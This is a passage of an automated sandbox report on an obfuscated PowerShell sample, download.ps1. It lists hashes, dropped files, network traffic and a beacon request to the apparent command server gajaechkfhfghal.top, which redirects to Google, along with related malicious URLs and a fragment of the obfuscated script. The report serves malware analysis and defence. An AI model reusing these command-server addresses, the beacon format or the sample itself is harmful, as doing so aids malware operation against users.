                                                                                                  https://www.google.com/logos/doodles/2024/seasonal-holidays-2powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.1561791044.000001E51D098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://aka.ms/pscore68powershell.exe, 00000000.00000002.1561791044.000001E51CE71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.1561791044.000001E51E919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://crl.microspowershell.exe, 00000000.00000002.1604648751.000001E53522A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs
                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  172.217.19.228
                                                                                                                  www.google.comUnited States
                                                                                                                  15169GOOGLEUSfalse
                                                                                                                  45.61.136.138
                                                                                                                  gajaechkfhfghal.topUnited States
                                                                                                                  40676AS40676USfalse
                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1579696
                                                                                                                  Start date and time:2024-12-23 07:41:46 +01:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 4m 40s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Number of analysed new started processes analysed:8
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:download.ps1
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal68.evad.winPS1@2/7@2/2
                                                                                                                  EGA Information:Failed
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 100%
                                                                                                                  • Number of executed functions: 24
                                                                                                                  • Number of non-executed functions: 4
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .ps1
                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 4.175.87.197
                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7716 because it is empty
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                  TimeTypeDescription
                                                                                                                  01:42:46API Interceptor42x Sleep call for process: powershell.exe modified
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • cmacnnkfbhlcncm.top/mes6v8wj5phtr.php?id=computer&key=28342894733&s=527
                                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • cmacnnkfbhlcncm.top/tj9wps52g1htr.php?id=computer&key=19746202345&s=527
                                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • cmacnnkfbhlcncm.top/cbym9z28drhtr.php?id=user-PC&key=95448541662&s=527
                                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • cmacnnkfbhlcncm.top/jrmyitwlvqhtr.php?id=user-PC&key=69811902417&s=527
                                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527
                                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527
                                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527
                                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • cmacnnkfbhlcncm.top/5jmw10tyqfhtr.php?id=user-PC&key=113750624201&s=527
                                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527
                                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • cmacnnkfbhlcncm.top/lbs39er51ghtr.php?id=computer&key=31400257058&s=527
                                                                                                                  No context
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  AS40676USloligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                  • 107.176.168.244
                                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 45.61.136.138
                                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 45.61.136.138
                                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 45.61.136.138
                                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 45.61.136.138
                                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 45.61.136.138
                                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 45.61.136.138
                                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 45.61.136.138
                                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  • 45.61.136.138
                                                                                                                  la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                                                  • 107.160.112.122
                                                                                                                  No context
                                                                                                                  No context
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):64
                                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:NlllulltP/XZ:NllU
                                                                                                                  MD5:F4FD6F7F8DDC8D2716B5AE289B93BDCE
                                                                                                                  SHA1:F48B3E013E3536DB71FED89B5786847E3951C767
                                                                                                                  SHA-256:84EDE900B5623435AF6CC6C8266F751A2BF95CBF19E9B12C63178A389A3472C0
                                                                                                                  SHA-512:B7C830C41152C07E30DDA334F0B0F2CEF9632074FE87958680B490CC6A650145536D33178E2E744AAC2303014A4C243C3DAA5E44261291DC853C977911FFBB09
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview:@...e.................................4.*............@..........
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:high, very likely benign file
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:high, very likely benign file
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:high, very likely benign file
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6222
                                                                                                                  Entropy (8bit):3.7188534246471447
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:U5cJqC+P8NkvhkvCCt35Dk22YXHIPDk22Y1HIN:RJoPS35DCPDsN
                                                                                                                  MD5:D5333A6FC6F73159FA4DABF334B873A8
                                                                                                                  SHA1:66392228339649C5941AD01FD07C654D378AF5B6
                                                                                                                  SHA-256:45F5EC83831A00DA264BC2BA8BF87A6B9772B92BB8D6ACD5DBC183D0CC759C0A
                                                                                                                  SHA-512:8B7A30BE7358D4B2B25390775EB5324E8B253F104DC3B179001532169C8C7C1FEF5751B80E46291240F031C150EC2ABC24620C330E2851FB1DC12375C79973FB
                                                                                                                  Malicious:false
                                                                                                                  Preview:...................................FL..................F.".. ......Yd.....]..U..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...C....U....l..U......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.YT5..........................d...A.p.p.D.a.t.a...B.V.1......YR5..Roaming.@......EW)B.YR5..........................W.F.R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.YO5............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.YO5..........................@u..W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.YO5....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.YO5....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.YV5.....0..........
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6222
                                                                                                                  Entropy (8bit):3.7188534246471447
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:U5cJqC+P8NkvhkvCCt35Dk22YXHIPDk22Y1HIN:RJoPS35DCPDsN
                                                                                                                  MD5:D5333A6FC6F73159FA4DABF334B873A8
                                                                                                                  SHA1:66392228339649C5941AD01FD07C654D378AF5B6
                                                                                                                  SHA-256:45F5EC83831A00DA264BC2BA8BF87A6B9772B92BB8D6ACD5DBC183D0CC759C0A
                                                                                                                  SHA-512:8B7A30BE7358D4B2B25390775EB5324E8B253F104DC3B179001532169C8C7C1FEF5751B80E46291240F031C150EC2ABC24620C330E2851FB1DC12375C79973FB
                                                                                                                  Malicious:false
                                                                                                                  Preview:...................................FL..................F.".. ......Yd.....]..U..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...C....U....l..U......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.YT5..........................d...A.p.p.D.a.t.a...B.V.1......YR5..Roaming.@......EW)B.YR5..........................W.F.R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.YO5............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.YO5..........................@u..W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.YO5....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.YO5....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.YV5.....0..........
                                                                                                                  File type:ASCII text, with very long lines (10990), with CRLF line terminators
                                                                                                                  Entropy (8bit):5.952403909557925
                                                                                                                  TrID:
                                                                                                                    File name:download.ps1
                                                                                                                    File size:20'062 bytes
                                                                                                                    MD5:59908f67a71ad9340c677542cc600f9e
                                                                                                                    SHA1:1213cf8e1e34acd11a68e6b4c4f4ce97abe06901
                                                                                                                    SHA256:0fd9309ca77dbf0977bbfa58941ef51ed866d6e79f03e5ba89e31743b8627901
                                                                                                                    SHA512:dfbce4da82f166ca2d3732354cac24e7d390cd59d9fe37781dbd7dfa8ccb72c26a266673a2d57eab0fde3bd02fa6170ca8a7b260d529910839d351f284fd645e
                                                                                                                    SSDEEP:384:rWlP/MWwwQ+e6wFk8mvyC2GNtErLaogF1jDl9i5dSTKnCDJI:/FydwrCyCzacziQKnCu
                                                                                                                    TLSH:0E926CF12748E4D2C29DD66EBF067C182BA4711FD9DB65C0BB7AC0D23360251AF88E41
                                                                                                                    File Content Preview:$kzfyrqpsetnimx=$executioncontext;$beanatonedanisorisisbe = -join (0..54 | ForEach-Object {[char]([int]"0000000000000132000000000000013100000000000001360000000000000129000000000000013500000000000001330000000000000135000000000000013400000000000001340000000
                                                                                                                    Icon Hash:3270d6baae77db44
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 23, 2024 07:42:51.558378935 CET4970580192.168.2.845.61.136.138
                                                                                                                    Dec 23, 2024 07:42:51.677933931 CET804970545.61.136.138192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:51.678013086 CET4970580192.168.2.845.61.136.138
                                                                                                                    Dec 23, 2024 07:42:51.689800978 CET4970580192.168.2.845.61.136.138
                                                                                                                    Dec 23, 2024 07:42:51.809428930 CET804970545.61.136.138192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:53.008675098 CET804970545.61.136.138192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:53.049417019 CET4970580192.168.2.845.61.136.138
                                                                                                                    Dec 23, 2024 07:42:53.160764933 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:53.280404091 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:53.280522108 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:53.280738115 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:53.400173903 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.100445986 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.100490093 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.100503922 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.100682974 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.100744009 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.100759029 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.100771904 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.100785971 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.100805044 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.100826025 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.101232052 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.101246119 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.101259947 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.101285934 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.101299047 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.220444918 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.220489025 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.220627069 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.287426949 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.292407036 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.292443037 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.292538881 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.296643972 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.296751022 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.296762943 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.305011988 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.305128098 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.307940006 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.308032036 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.308129072 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.314563036 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.321623087 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.321692944 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.321728945 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.325719118 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.325809956 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.335201025 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.335282087 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.335386038 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.339370966 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.350033045 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.350133896 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.350260019 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.354363918 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.354520082 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.362550974 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.362648964 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.362725019 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.366687059 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.376075983 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.376173973 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.412189960 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.412230015 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.412496090 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.416290998 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.416344881 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.416435957 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.484296083 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.484353065 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.484481096 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.486738920 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.486844063 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.486929893 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.491735935 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.493525028 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.493603945 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.493664026 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.498456001 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.498811960 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.498863935 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.498970032 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.499403954 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.503746986 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.508800030 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.508855104 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.508867979 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.511185884 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.512075901 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.522505045 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.522615910 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.522671938 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.524923086 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.542073965 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.542093039 CET8049706172.217.19.228192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:55.542159081 CET4970680192.168.2.8172.217.19.228
                                                                                                                    Dec 23, 2024 07:42:55.906267881 CET4970580192.168.2.845.61.136.138
                                                                                                                    Dec 23, 2024 07:42:55.910295010 CET4970680192.168.2.8172.217.19.228
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 23, 2024 07:42:50.979826927 CET5648153192.168.2.81.1.1.1
                                                                                                                    Dec 23, 2024 07:42:51.543488026 CET53564811.1.1.1192.168.2.8
                                                                                                                    Dec 23, 2024 07:42:53.011363983 CET6529253192.168.2.81.1.1.1
                                                                                                                    Dec 23, 2024 07:42:53.150698900 CET53652921.1.1.1192.168.2.8
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Dec 23, 2024 07:42:50.979826927 CET192.168.2.81.1.1.10x592aStandard query (0)gajaechkfhfghal.topA (IP address)IN (0x0001)false
                                                                                                                    Dec 23, 2024 07:42:53.011363983 CET192.168.2.81.1.1.10xe1c8Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Dec 23, 2024 07:42:51.543488026 CET1.1.1.1192.168.2.80x592aNo error (0)gajaechkfhfghal.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                                    Dec 23, 2024 07:42:53.150698900 CET1.1.1.1192.168.2.80xe1c8No error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                    • gajaechkfhfghal.top
                                                                                                                    • www.google.com
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.84970545.61.136.138807716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 23, 2024 07:42:51.689800978 CET216OUTGET /q9lpw6berahtr.php?id=user-PC&key=70313677457&s=527 HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                    Host: gajaechkfhfghal.top
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Dec 23, 2024 07:42:53.008675098 CET166INHTTP/1.1 302 Found
                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                    Date: Mon, 23 Dec 2024 06:42:52 GMT
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: keep-alive
                                                                                                                    Location: http://www.google.com


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.849706172.217.19.228807716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 23, 2024 07:42:53.280738115 CET159OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                    Host: www.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Dec 23, 2024 07:42:55.100445986 CET1236INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 23 Dec 2024 06:42:54 GMT
                                                                                                                    Expires: -1
                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                    Content-Type: text/html; charset=UTF-8
